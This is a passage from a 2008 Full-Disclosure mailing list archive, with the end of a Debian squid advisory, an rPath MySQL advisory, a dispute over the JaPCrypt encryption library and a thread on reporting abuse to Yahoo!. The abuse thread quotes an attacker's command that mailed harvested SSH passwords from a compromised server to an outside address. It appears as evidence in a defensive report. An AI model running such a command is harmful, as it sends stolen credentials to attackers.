fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian 4.0 (stable) - ------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1.dsc Size/MD5 checksum: 669 47baab1a60087828b695388c6edb1ee6 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5.orig.tar.gz Size/MD5 checksum: 1636886 26cc918028340dc8ceb9c0c4b988d717 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1.diff.gz Size/MD5 checksum: 273904 db13c592e621e1b8571c01846842b8fd Architecture independent packages: http://security.debian.org/pool/updates/main/s/squid/squid-common_2.6.5-6etch1_all.deb Size/MD5 checksum: 437110 ac8cac2b29366e044e8362a7b394fc9d alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_alpha.deb Size/MD5 checksum: 791040 6e313f97d91d37b726eea9194ded5a5b http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_alpha.deb Size/MD5 checksum: 87964 e6cb717df88977abfe41597384d96f6d http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_alpha.deb Size/MD5 checksum: 119136 79b01bf8b6310cca9812cfae2c7b3170 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_amd64.deb Size/MD5 checksum: 710400 9141b003810e1c50c364cd0303efd74f http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_amd64.deb Size/MD5 checksum: 116352 1bf89f1f564164df73e3c32515e63ffb http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_amd64.deb Size/MD5 checksum: 86070 2818713df831edc4aeb01b3686d31e79 arm architecture (ARM) http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_arm.deb Size/MD5 checksum: 115880 4c8cef9241a1377f7f49cab25af3b9b8 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_arm.deb Size/MD5 checksum: 676344 f693173e2c78bcda2211a1323ac85f9b http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_arm.deb Size/MD5 checksum: 85944 a9a014a349f7f826bf271fcdb1337334 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_hppa.deb Size/MD5 checksum: 117330 28e6069fb0b0e71b6f7d2a550cea9570 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_hppa.deb Size/MD5 checksum: 749000 abe4f58c0af4c5837a8ed1bf3b109b8b http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_hppa.deb Size/MD5 checksum: 87644 5c50485a6cf9faaa75ab97171464d4f1 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_i386.deb Size/MD5 checksum: 654734 bdc20bc1b981d81b23e11eaa51b5d446 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_i386.deb Size/MD5 checksum: 85694 a125ae94c477acbd039916cb5295495c http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_i386.deb Size/MD5 checksum: 116008 ad3a1b4e437ea7a54aa27322d4ab5aa3 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_ia64.deb Size/MD5 checksum: 1066988 33f9cb183e83c91999b0fca9d7535a04 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_ia64.deb Size/MD5 checksum: 91272 dd10ed4eea19bde3c1e201c47aff656d http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_ia64.deb Size/MD5 checksum: 124104 f6f9be771782b221d1faea48d8ee842f mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_mips.deb Size/MD5 checksum: 117058 6bd05ff7a166f10235a490d83adc9aaa http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_mips.deb Size/MD5 checksum: 87190 71adec3b47f6d047c5f00cb65986abc4 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_mips.deb Size/MD5 checksum: 742994 81160ebb191aa27d0c77e4454d2e13e3 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_mipsel.deb Size/MD5 checksum: 117110 001be9f34ed3140d2fa8e4c698d08b4a http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_mipsel.deb Size/MD5 checksum: 87182 63006b975b09a4069bedaa5d78ab68d7 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_mipsel.deb Size/MD5 checksum: 747278 16486cdd91d2c1ddc68e2b3329cc0d94 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_powerpc.deb Size/MD5 checksum: 712288 694870f8b4dd3fed1e1133f82f584557 http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_powerpc.deb Size/MD5 checksum: 86036 91ed9e4120cc6667ae5956ff8d2df43a http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_powerpc.deb Size/MD5 checksum: 116278 925d2622313fbc249ba896dc3ce87483 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_s390.deb Size/MD5 checksum: 116628 162bcb6411f90ce10b0406cca1cc081b http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_s390.deb Size/MD5 checksum: 86486 0373bb3d5504cd041025a41fcae00fb4 http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_s390.deb Size/MD5 checksum: 711796 c7458baad180e177878eb324a5208488 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/s/squid/squid_2.6.5-6etch1_sparc.deb Size/MD5 checksum: 667184 247fddedfe397f756ebb00d6b44c413a http://security.debian.org/pool/updates/main/s/squid/squidclient_2.6.5-6etch1_sparc.deb Size/MD5 checksum: 86224 3c22a2f372efb50fc7c1976a20c9fdc2 http://security.debian.org/pool/updates/main/s/squid/squid-cgi_2.6.5-6etch1_sparc.deb Size/MD5 checksum: 115852 90d0326044c9796c51b73dd09aa7c34a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFHqOWbXm3vHE4uyloRAiMrAJ9cS5saJzLK0WAut9cnELFH+XYtigCgzuQy WB2tkIUdYw0jKUMjrQqoARI= =hBUA -----END PGP SIGNATURE----- From psz at maths.usyd.edu.au Wed Feb 6 00:11:14 2008 From: psz at maths.usyd.edu.au (Paul Szabo) Date: Wed, 6 Feb 2008 11:11:14 +1100 Subject: [Full-disclosure] Acroread 8.1.2: why? Message-ID: <200802060011.m160BEWl009639@asti.maths.usyd.edu.au> I notice that Adobe have released Acroread 8.1.2 for both Windows and Linux. Anyone know what changed? In the past, Adobe was never that quick unless it was a serious security issue. Thanks, Paul Szabo psz at maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia From announce-noreply at rpath.com Tue Feb 5 20:48:21 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 05 Feb 2008 15:48:21 -0500 Subject: [Full-disclosure] rPSA-2008-0040-1 mysql mysql-bench mysql-server Message-ID: <47a8cb95.EKypmGBVH9A1NF39%announce-noreply@rpath.com> rPath Security Advisory: 2008-0040-1 Published: 2008-02-05 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Deterministic Weakness Updated Versions: mysql=conary.rpath.com at rpl:1/5.0.51a-0.2-1 mysql-bench=conary.rpath.com at rpl:1/5.0.51a-0.2-1 mysql-server=conary.rpath.com at rpl:1/5.0.51a-0.2-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2187 https://issues.rpath.com/browse/RPL-2188 Description: Previous versions of the mysql package contain multiple weaknesses that can lead to local-server crashes and internal privilege escalations. Additionally, the immediately previous version of mysql was unable to create databases in TRADITIONAL mode. This has been corrected. http://wiki.rpath.com/Advisories:rPSA-2008-0040 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From gerardo at linux.it Tue Feb 5 23:23:26 2008 From: gerardo at linux.it (Gerardo Di Giacomo) Date: Wed, 06 Feb 2008 00:23:26 +0100 Subject: [Full-disclosure] JaPCrypt Message-ID: <20080206010623.1C3DE179@lists.grok.org.uk> JaPCrypt means Javascript and PHP Encryption. JaPCrypt is a PHP class which purpose is to give encrypted communications over HTTP by using server and client side scriptng like PHP and Javascript. This project has been started because not every hosting provider gives HTTPS access, thus not having the possibility to manage safely sensitive datas. Also, JaPCrypt could be implemented in common CMSes that don't support HTTPS natively for administration/private sections (i.e. Joomla). Happy coding. URL: http://japcrypt.sourceforge.net Greetings, Gerardo -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 249 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/c033de25/attachment.bin From coderman at gmail.com Wed Feb 6 10:18:10 2008 From: coderman at gmail.com (coderman) Date: Wed, 6 Feb 2008 02:18:10 -0800 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <20080206010623.1C3DE179@lists.grok.org.uk> References: <20080206010623.1C3DE179@lists.grok.org.uk> Message-ID: <4ef5fec60802060218i664a875dv9b54a24077d1b896@mail.gmail.com> On Feb 5, 2008 3:23 PM, Gerardo Di Giacomo wrote: > JaPCrypt means Javascript and PHP Encryption. and pwned by eve (MITM makes this useless) fun code though. should have read crypto 101 before spending so much time... best regards, From coderman at gmail.com Wed Feb 6 10:28:00 2008 From: coderman at gmail.com (coderman) Date: Wed, 6 Feb 2008 02:28:00 -0800 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: References: Message-ID: <4ef5fec60802060228tfa9337aw41ff2c9b464ca6ce@mail.gmail.com> On Feb 4, 2008 1:25 PM, reepex wrote: > ... all you have triggered is normal > behavior for auto logging into .htaccess protected they apparently cannot hear you, reepex. perhaps if you had IM and E-mail contact with some of Yahoo's top security advisors and security engineers, then you could be heard! in the words of one distiguished gentleman of the alias, "Dr. J Mengele, PhD." LOLOLOLOLOLOL!!! best regards, From coderman at gmail.com Wed Feb 6 11:01:28 2008 From: coderman at gmail.com (coderman) Date: Wed, 6 Feb 2008 03:01:28 -0800 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: <4ef5fec60802060228tfa9337aw41ff2c9b464ca6ce@mail.gmail.com> References: <4ef5fec60802060228tfa9337aw41ff2c9b464ca6ce@mail.gmail.com> Message-ID: <4ef5fec60802060301p34463a51t5d07570ac441493f@mail.gmail.com> holy shit, someone actually email'ed me off list asking for details of this "explioit" !!! bwahahaha... heheh.. *snif* god, my side hurts. please, before giving further conniptions, refer yourself kindly to rfc particularly "...://:@:/" for uri's... On Feb 6, 2008 2:28 AM, coderman wrote: > On Feb 4, 2008 1:25 PM, reepex wrote: > > ... all you have triggered is normal > > behavior for auto logging into .htaccess protected > .... > LOLOLOLOLOLOL!!! .... oops. did i top post? my apologies. please reply to this thread to accept my apology. or confirm vulnerability on dec alpha 64 bit. best regards to your mother, From mailinglists at syn-ack.org Wed Feb 6 10:58:31 2008 From: mailinglists at syn-ack.org (Vincent van Scherpenseel) Date: Wed, 06 Feb 2008 11:58:31 +0100 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? Message-ID: <47A992D7.1070503@syn-ack.org> Their abuse policy of course! Last week a client's server was being attacked (some old Tomcat5 vuln) and used to attack other servers (ssh login guessing). The results of these dictionary attack were being mailed to the address 'blax2004us at yahoo.com': cat vuln.txt |mail -s "Lame Gang Us Roots" blax2004us at yahoo.com After I addressed the vulnerability I decided to contact yahoo.com about this issue. Of course the only way to do this was by browsing the Yahoo.com site for any abuse/security contacts. After a while I found a form I could use to notify them of abuse of their services. So I wrote them a quick explanation about what was going on including the e-mail address of the account used to harvest passwords. After a couple of hours I received an e-mail from 'Marcus' a Yahoo! Customer Care representative (44592956) asking me to provide a the full subject and other headers from the spam I had received. After writing back kindly that I had no spam complaint but wanted to report the mal-use of an account of theirs I received another reply a little while later asking me to provide my *personal* information about my account and what errors I got when I tried to login. Well, I don't even *have* an Yahoo! account. So, what do you do when you want to report something like this? In fact I'm doing them a favor by reporting but all I got is this lousy response. I'll have to think twice about reporting something like this next time... Does anyone know an Yahoo! security contact that actually does his job? Kind Regards, Vincent van Scherpenseel -- ServerFloor.com From coderman at gmail.com Wed Feb 6 11:13:48 2008 From: coderman at gmail.com (coderman) Date: Wed, 6 Feb 2008 03:13:48 -0800 Subject: [Full-disclosure] Firefox 2.0.0.12 SSL Spoofing and Domain Guessing vulnerabilities In-Reply-To: <4ef5fec60802060301p34463a51t5d07570ac441493f@mail.gmail.com> References: <4ef5fec60802060228tfa9337aw41ff2c9b464ca6ce@mail.gmail.com> <4ef5fec60802060301p34463a51t5d07570ac441493f@mail.gmail.com> Message-ID: <4ef5fec60802060313i1c5a2c82l7533343e955f892@mail.gmail.com> On Feb 6, 2008 3:05 AM, worried security wrote: > > On Feb 6, 2008 3:01 AM, coderman wrote: > > holy shit, someone actually email'ed me off list asking for details of > > this "explioit" !!! >... > You FOOL!! > > Youre playing with fire. Fire that cannot be put out > with words but only inflame the situation of which > you are misinformed! lol n3td3v From tbiehn at gmail.com Wed Feb 6 11:34:12 2008 From: tbiehn at gmail.com (T Biehn) Date: Wed, 6 Feb 2008 06:34:12 -0500 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <4ef5fec60802060218i664a875dv9b54a24077d1b896@mail.gmail.com> References: <20080206010623.1C3DE179@lists.grok.org.uk> <4ef5fec60802060218i664a875dv9b54a24077d1b896@mail.gmail.com> Message-ID: <2d6724810802060334u61f12139s3d58a1ec13a4773f@mail.gmail.com> SYNCHRONICITY On Feb 6, 2008 5:18 AM, coderman wrote: > On Feb 5, 2008 3:23 PM, Gerardo Di Giacomo wrote: > > JaPCrypt means Javascript and PHP Encryption. > > and pwned by eve > > (MITM makes this useless) > > fun code though. should have read crypto 101 before spending so much time... > > best regards, > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From tbiehn at gmail.com Wed Feb 6 11:38:16 2008 From: tbiehn at gmail.com (T Biehn) Date: Wed, 6 Feb 2008 06:38:16 -0500 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <2d6724810802060334u61f12139s3d58a1ec13a4773f@mail.gmail.com> References: <20080206010623.1C3DE179@lists.grok.org.uk> <4ef5fec60802060218i664a875dv9b54a24077d1b896@mail.gmail.com> <2d6724810802060334u61f12139s3d58a1ec13a4773f@mail.gmail.com> Message-ID: <2d6724810802060338v62b8057ew4ffd7f5ffbae7b5c@mail.gmail.com> mitm doesn't make this useless, btw. As stated its symmetric encryption, one has to check the javascript source to see that the key isn't being SENT of course. On Feb 6, 2008 6:34 AM, T Biehn wrote: > SYNCHRONICITY > > > > On Feb 6, 2008 5:18 AM, coderman wrote: > > On Feb 5, 2008 3:23 PM, Gerardo Di Giacomo wrote: > > > JaPCrypt means Javascript and PHP Encryption. > > > > and pwned by eve > > > > (MITM makes this useless) > > > > fun code though. should have read crypto 101 before spending so much time... > > > > best regards, > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > > > From gerardo at linux.it Wed Feb 6 11:21:02 2008 From: gerardo at linux.it (Gerardo Di Giacomo) Date: Wed, 06 Feb 2008 12:21:02 +0100 Subject: [Full-disclosure] JaPCrypt Message-ID: <20080206112111.D75DD68A@lists.grok.org.uk> > (MITM makes this useless) Uhm... tell me why. The PSK is never sent, neither by the client neither by the server. But of course, this is an open project if you find bugs please report them ;) Bye, Gerardo -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 249 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/448db4a4/attachment.bin From coderman at gmail.com Wed Feb 6 11:59:30 2008 From: coderman at gmail.com (coderman) Date: Wed, 6 Feb 2008 03:59:30 -0800 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <20080206112111.D75DD68A@lists.grok.org.uk> References: <20080206112111.D75DD68A@lists.grok.org.uk> Message-ID: <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> On Feb 6, 2008 3:21 AM, Gerardo Di Giacomo wrote: > ... > The PSK is never sent, neither by the client neither by the server. apologies, i will be more clear: since psk without key distribution nor secure secret exchange does not solve the problems that HTTPS solves, to say this is useful in situations where HTTPS is not available is disingenuous. From Klinzer at gmx.de Wed Feb 6 12:22:17 2008 From: Klinzer at gmx.de (Ferdinand Klinzer) Date: Wed, 6 Feb 2008 13:22:17 +0100 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: <47A992D7.1070503@syn-ack.org> References: <47A992D7.1070503@syn-ack.org> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I think the adress is security at yahoo.com Cheers Ferdinand from Germany Am 06.02.2008 um 11:58 schrieb Vincent van Scherpenseel: > Their abuse policy of course! > > Last week a client's server was being attacked (some old Tomcat5 vuln) > and used to attack other servers (ssh login guessing). The results of > these dictionary attack were being mailed to the address > 'blax2004us at yahoo.com': > cat vuln.txt |mail -s "Lame Gang Us Roots" blax2004us at yahoo.com > > After I addressed the vulnerability I decided to contact yahoo.com > about > this issue. Of course the only way to do this was by browsing the > Yahoo.com site for any abuse/security contacts. After a while I > found a > form I could use to notify them of abuse of their services. So I wrote > them a quick explanation about what was going on including the e-mail > address of the account used to harvest passwords. > > After a couple of hours I received an e-mail from 'Marcus' a Yahoo! > Customer Care representative (44592956) asking me to provide a the > full > subject and other headers from the spam I had received. > > After writing back kindly that I had no spam complaint but wanted to > report the mal-use of an account of theirs I received another reply a > little while later asking me to provide my *personal* information > about > my account and what errors I got when I tried to login. Well, I don't > even *have* an Yahoo! account. > > So, what do you do when you want to report something like this? In > fact > I'm doing them a favor by reporting but all I got is this lousy > response. I'll have to think twice about reporting something like this > next time... > > Does anyone know an Yahoo! security contact that actually does his > job? > > Kind Regards, > Vincent van Scherpenseel > > -- > ServerFloor.com > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.3 (Darwin) iD8DBQFHqaZ5ivpgT1glX4cRAoiGAKCmtLIJk0zsxBr7+DxUknYpHdm34ACcCxPx FJpUA2qj8Bv9q7ehmt8dk60= =e2B1 -----END PGP SIGNATURE----- From juha-matti.laurio at netti.fi Wed Feb 6 13:32:38 2008 From: juha-matti.laurio at netti.fi (Juha-Matti Laurio) Date: Wed, 6 Feb 2008 15:32:38 +0200 (EET) Subject: [Full-disclosure] Acroread 8.1.2: why? Message-ID: <5156392.1810431202304758475.JavaMail.juha-matti.laurio@netti.fi> Probably you are pointing to this advisory: http://kb.adobe.com/selfservice/viewContent.do?externalId=kb403079&sliceId=1 Secunia sees these as Remote type SA28802 http://secunia.com/advisories/28802/ FrSIRT as Remote type FrSIRT/ADV-2008-0425 http://www.frsirt.com/english/advisories/2008/0425 and Symantec as BID27641 http://www.securityfocus.com/bid/27641 I.e. no technical details available. Juha-Matti Paul Szabo wrote: > I notice that Adobe have released Acroread 8.1.2 for both Windows > and Linux. Anyone know what changed? In the past, Adobe was never > that quick unless it was a serious security issue. > > Thanks, > > Paul Szabo psz at maths.usyd.edu.au http://www.maths.usyd.edu.au/u/psz/ > School of Mathematics and Statistics University of Sydney Australia > From Valdis.Kletnieks at vt.edu Wed Feb 6 15:42:19 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 06 Feb 2008 10:42:19 -0500 Subject: [Full-disclosure] JaPCrypt In-Reply-To: Your message of "Wed, 06 Feb 2008 03:59:30 PST." <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> References: <20080206112111.D75DD68A@lists.grok.org.uk> <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> Message-ID: <20770.1202312539@turing-police.cc.vt.edu> On Wed, 06 Feb 2008 03:59:30 PST, coderman said: > since psk without key distribution nor secure secret exchange does not > solve the problems that HTTPS solves, to say this is useful in > situations where HTTPS is not available is disingenuous. Sure. So you e-mail the shared secret in a PGP or S/MIME encrypted mail. So saying that it doesn't work because there's no secure secret exchange is disingenuous as well. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/97517cb3/attachment.bin From epic at hack3r.com Wed Feb 6 16:13:56 2008 From: epic at hack3r.com (Epic) Date: Wed, 6 Feb 2008 11:13:56 -0500 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <20770.1202312539@turing-police.cc.vt.edu> References: <20080206112111.D75DD68A@lists.grok.org.uk> <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> <20770.1202312539@turing-police.cc.vt.edu> Message-ID: <11e1d1550802060813t5ee449b7jac9428f22fdf7b36@mail.gmail.com> Shut up Valdis! On 2/6/08, Valdis.Kletnieks at vt.edu wrote: > > On Wed, 06 Feb 2008 03:59:30 PST, coderman said: > > > since psk without key distribution nor secure secret exchange does not > > solve the problems that HTTPS solves, to say this is useful in > > situations where HTTPS is not available is disingenuous. > > Sure. So you e-mail the shared secret in a PGP or S/MIME encrypted mail. > > So saying that it doesn't work because there's no secure secret exchange > is disingenuous as well. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/75154360/attachment.html From Valdis.Kletnieks at vt.edu Wed Feb 6 16:39:31 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 06 Feb 2008 11:39:31 -0500 Subject: [Full-disclosure] JaPCrypt In-Reply-To: Your message of "Wed, 06 Feb 2008 17:23:49 +0100." <6E6245CE-726B-4D36-93DC-08860BDF40F7@guru.at> References: <20080206112111.D75DD68A@lists.grok.org.uk> <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> <20770.1202312539@turing-police.cc.vt.edu> <6E6245CE-726B-4D36-93DC-08860BDF40F7@guru.at> Message-ID: <1110.1202315971@turing-police.cc.vt.edu> On Wed, 06 Feb 2008 17:23:49 +0100, Christoph Gruber said: > If you are able to use PGP/GPG/S/Mime you HAVE already an implemented > PKI. Why should someone use PKI to initialize another? There's this thing called "The Real World", where often you end up doing stuff like this because something is just plain busticated. For instance, https gives us: a PKI that allows us to use RSA or similar to verify the other end's identity and exchange a shared-secret to use as a symmetric session key. Unfortunately, there's cases where you don't *have* https available (as noted in the original posting). So what do you do? You roll-your-own using PGP or S/MIME to verify identities (if it isn't who it claims to be from, it won't decrypt) and exchange a shared secret, and then use JaPCrypt to do the symmetric encryption. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/f50f6b0e/attachment.bin From pauls at utdallas.edu Wed Feb 6 16:44:10 2008 From: pauls at utdallas.edu (Paul Schmehl) Date: Wed, 06 Feb 2008 10:44:10 -0600 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: <47A992D7.1070503@syn-ack.org> References: <47A992D7.1070503@syn-ack.org> Message-ID: --On Wednesday, February 06, 2008 11:58:31 +0100 Vincent van Scherpenseel wrote: > > So, what do you do when you want to report something like this? In fact > I'm doing them a favor by reporting but all I got is this lousy > response. I'll have to think twice about reporting something like this > next time... > > Does anyone know an Yahoo! security contact that actually does his job? > You do this the old fashioned way. # dig -t MX yahoo.com ; <<>> DiG 9.3.3 <<>> -t MX yahoo.com ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10018 ;; flags: qr rd ra; QUERY: 1, ANSWER: 7, AUTHORITY: 7, ADDITIONAL: 14 ;; QUESTION SECTION: ;yahoo.com. IN MX ;; ANSWER SECTION: yahoo.com. 1058 IN MX 1 g.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 a.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 b.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 c.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 d.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 e.mx.mail.yahoo.com. yahoo.com. 1058 IN MX 1 f.mx.mail.yahoo.com. # telnet f.mx.mail.yahoo.com 25 Trying 209.191.88.247... Connected to f.mx.mail.yahoo.com. Escape character is '^]'. 220 mta378.mail.mud.yahoo.com ESMTP YSmtp service ready EHLO hostname.utdallas.edu 250-mta378.mail.mud.yahoo.com 250-8BITMIME 250-SIZE 31981568 250 PIPELINING MAIL FROM: testing at utdallas.edu 501 Syntax error in parameters or arguments MAIL FROM: 250 sender ok RCPT TO: abuse at yahoo.com 501 Syntax error in parameters or arguments RCPT TO: 250 recipient ok RCPT TO: 250 recipient ok RCPT TO: 250 recipient ok RCPT TO: 250 recipient ok quit 221 mta378.mail.mud.yahoo.com Connection closed by foreign host. Pick your poison. -- Paul Schmehl (pauls at utdallas.edu) Senior Information Security Analyst The University of Texas at Dallas http://www.utdallas.edu/ir/security/ From list at guru.at Wed Feb 6 16:23:49 2008 From: list at guru.at (Christoph Gruber) Date: Wed, 6 Feb 2008 17:23:49 +0100 Subject: [Full-disclosure] JaPCrypt In-Reply-To: <20770.1202312539@turing-police.cc.vt.edu> References: <20080206112111.D75DD68A@lists.grok.org.uk> <4ef5fec60802060359o12f508d9q885e2cdff052324a@mail.gmail.com> <20770.1202312539@turing-police.cc.vt.edu> Message-ID: <6E6245CE-726B-4D36-93DC-08860BDF40F7@guru.at> Valdis.Kletnieks at vt.edu wrote on 06.02.2008 at 16:42: > Sure. So you e-mail the shared secret in a PGP or S/MIME encrypted > mail. > > So saying that it doesn't work because there's no secure secret > exchange > is disingenuous as well. If you are able to use PGP/GPG/S/Mime you HAVE already an implemented PKI. Why should someone use PKI to initialize another? -- Grisu From Valdis.Kletnieks at vt.edu Wed Feb 6 17:17:14 2008 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 06 Feb 2008 12:17:14 -0500 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: Your message of "Wed, 06 Feb 2008 10:44:10 CST." References: <47A992D7.1070503@syn-ack.org> Message-ID: <3154.1202318234@turing-police.cc.vt.edu> On Wed, 06 Feb 2008 10:44:10 CST, Paul Schmehl said: > RCPT TO: > 250 recipient ok % telnet f.mx.mail.yahoo.com 25 ... rcpt to: 250 recipient ok Yee. Hah. They 250 for a probably-nonexistent account (unless that one actually *does* exist? :) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080206/fd1d7730/attachment.bin From pauls at utdallas.edu Wed Feb 6 17:40:06 2008 From: pauls at utdallas.edu (Paul Schmehl) Date: Wed, 06 Feb 2008 11:40:06 -0600 Subject: [Full-disclosure] What makes Yahoo! a good merger candidate? In-Reply-To: <47A9ED7F.3090208@ip-solutions.net> References: <47A992D7.1070503@syn-ack.org> <3154.1202318234@turing-police.cc.vt.edu> <47A9ED7F.3090208@ip-solutions.net> Message-ID: <351ABF9DBD9106470C4ECD82@utd59514.utdallas.edu> --On Wednesday, February 06, 2008 12:25:19 -0500 Harry Hoffman wrote: > You just need to take it a step further :-) > > ... > rcpt to: > 250 recipient ok > data > 354 go ahead > Testing > . > > 554 delivery error: dd This user doesn't have a yahoo.com account > (nosuchuser12323123123123132124432342 at yahoo.com) [0] - > mta367.mail.mud.yahoo.com > 421 Service not available, closing transmission channel. > Connection closed by foreign host. > > > Valdis.Kletnieks at vt.edu wrote: >> On Wed, 06 Feb 2008 10:44:10 CST, Paul Schmehl said: >> >>> RCPT TO: >>> 250 recipient ok >> >> % telnet f.mx.mail.yahoo.com 25 >> ... >> rcpt to: >> 250 recipient ok >> >> Yee. Hah. They 250 for a probably-nonexistent account (unless that >> one actually *does* exist? :) >> They're also the first mail server I've ever connected to that won't accept user at domain.tld and insists on instead. So, I'm not surprised to find that they 250 everything you type in. I guess RFCs are even more meaningless now than they always have been. :-( BTW, privately I was informed that the *real* address is security at yahoo-inc.com. Who knew. -- Paul Schmehl (pauls at 